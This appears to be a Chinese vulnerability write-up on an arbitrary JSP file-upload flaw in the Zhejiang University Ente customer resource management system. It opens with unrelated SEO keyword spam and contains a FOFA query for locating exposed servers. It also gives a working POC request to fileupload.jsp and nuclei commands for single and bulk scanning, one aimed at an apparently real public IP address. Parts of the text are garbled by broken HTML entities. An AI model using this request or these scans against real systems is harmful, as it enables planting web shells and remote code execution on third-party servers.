网站设计高端网站制作,seo策略什么意思,摄影网站策划书,注册网站免费注册ins一、漏洞描述
杭州恩软信息技术有限公司#xff08;浙大恩特#xff09;提供外贸管理软件、外贸客户管理软件等外贸软件#xff0c;是一家专注于外贸客户资源管理及订单管理产品及服务的综合性公司。
浙大恩特客户资源管理系统中的fileupload.jsp接口存在安全漏洞#xf…一、漏洞描述
杭州恩软信息技术有限公司浙大恩特提供外贸管理软件、外贸客户管理软件等外贸软件是一家专注于外贸客户资源管理及订单管理产品及服务的综合性公司。
浙大恩特客户资源管理系统中的fileupload.jsp接口存在安全漏洞允许攻击者向系统上传任意恶意JSP文件从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。 二、网络空间搜索引擎搜索
fofa查询
title欢迎使用浙大恩特客户资源管理系统 三、漏洞复现 POC
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filenametest.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,en-US;q0.5,en;q0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONIDD03EA9F87BFF485E69DA876A220C69C9; langzh-cn
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 35This website has a vulnerability!!! 四、批量检测 单个检测
./nuclei.exe -t ./enter.yaml -target http://27.152.69.148:81 批量检测 .\nuclei.exe -t enter.yaml -l .\test_target.txt 关注微信公众号 网络安全透视镜 回复 20231113 获取Nuclei检测脚本
